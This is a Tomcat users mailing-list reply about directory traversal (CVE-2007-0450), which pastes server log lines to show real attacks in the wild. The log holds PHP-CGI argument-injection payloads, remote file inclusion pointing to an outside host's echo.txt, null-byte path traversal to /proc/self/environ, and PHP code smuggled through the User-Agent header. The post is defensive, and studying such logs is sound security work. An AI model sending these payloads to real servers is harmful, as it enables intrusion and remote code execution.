tomcat-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From André Warnier ...@ice-sa.com>
Subject Re: Need help to understand CVE-2007-0450
Date Thu, 22 Nov 2012 13:26:08 GMT
Athanasios Kostopoulos wrote:
> On 22/11/12 10:52, Aditi Sinha wrote:
>> Hi Andre,
>>
>> Agree with your points.
>>
>> Just wanted to know more about  “Directory Traversal Attack".
>> Can it lead to access of directories outside Tomcat/webapps folder also
>>   or can it just try to access the applications within Tomcat/webapps
>> folder only?
>>
>>
>> Thanks & Regards,
>> Aditi
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> For additional commands, e-mail: users-help@tomcat.apache.org
>>
> Hi everyone,
> OWASP maintains some nice resources about path traversal attacks. A nice 
> starting point is the following:
> https://www.owasp.org/index.php/Path_Traversal
> 

And for anyone that would think that this is not a genuine concern, here are a few recent

samples from a logfile of one of our servers (among many, many similar ones) :

173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET 
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron

HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:27 +0100] "GET 
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron

HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt

HTTP/1.1" 200 45 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F178.63.8.214%2Fecho.txt

HTTP/1.1" 404 359 "-" "<?php echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?mod=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/index.php?page=http%3A%2F%2F178.63.8.214%2Fecho.txt HTTP/1.1" 404 359 "-" "<?php echo

\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:28 +0100] "GET 
/index.php?page=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php

echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET 
/?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 45 "-" "<?php echo 
\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET 
/index.php?mod=../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-" "<?php

echo \"dsfer34w5rl\".\"sidfosdedfpsd\";?>"
173.45.104.226 - - [17/Nov/2012:15:55:29 +0100] "GET 
/main.php?x=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 358 "-" "<?php echo

\"dsfer34w5rl\".\"sidfosdedfpsd\";?>"


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org


Mime
View raw message